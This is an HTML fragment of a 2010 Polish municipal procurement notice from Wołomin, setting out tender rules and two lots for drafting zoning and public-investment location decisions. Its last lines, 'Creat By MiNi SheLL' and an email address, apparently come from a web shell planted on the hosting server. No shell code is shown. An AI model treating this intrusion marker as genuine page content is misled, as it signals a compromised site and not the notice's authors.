<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w wypadku wystąpienia jednej z następujących okoliczności, tj.:
1) w wypadku zmian podmiotowych po stronie wykonawcy, zgodnie z obowiązującymi przepisami prawa,
2) w wypadku zmian nr rachunku bankowego wykonawcy, na który jest płacone wynagrodzenie,
3) w wypadku wszystkich zmian obiektywnie ocenianych, jako korzystne dla Zamawiającego,
4) w wypadku zmian stanu prawnego lub faktycznego, które maja wpływ na treść zawartej umowy, jeżeli taka zmiana leży w interesie publicznym,
5) w pozostałym zakresie - w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia strony nie mogły przewidzieć pomimo zachowania należytej staranności.
Zmiany postanowień zawartej umowy będą dokonane, za zgodą stron, wyłącznie w formie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.wolomin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wołominie, ul. Ogrodowa 4, pok. 223.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2010 godzina 10:00, miejsce: Urząd Miejski w Wołominie, ul. Ogrodowa 4, Biuro Obsługi Mieszkańców- stanowiska kancelaryjne nr 1, 2, 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sporządzenie 325 sztuk projektów decyzji o warunkach zabudowy w rozumieniu art. 4 ust. 2 pkt. 1 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie 325 sztuk projektów decyzji o warunkach zabudowy w rozumieniu art. 4 ust. 2 pkt. 1 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003r Nr 80 poz. 717 z późn. zm.), w tym projektów zmiany decyzji ostatecznych wydanych w tym zakresie,  wraz z niezbędnymi analizami i wynikami tych analiz, o których mowa w rozporządzeniu Ministra Infrastruktury z dnia 26.08.2003r., w oparciu o wnioski o wydanie decyzji o warunkach zabudowy złożone w 2010 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie 130 sztuk projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sporządzenie 130 sztuk projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego w rozumieniu art. 4 ust. 2 pkt. 2 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu  przestrzennym,  w tym projektów zmiany decyzji ostatecznych wydanych w tym zakresie,  wraz z dokonaniem analizy warunków i zasad zagospodarowania terenu oraz jego zabudowy, wynikających z przepisów odrębnych, oraz dokonaniem analizy stanu faktycznego i prawnego terenu, na którym przewiduje się realizację inwestycji, zgodnie z postanowieniami art. 53 ust. 3 powołanej ustawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com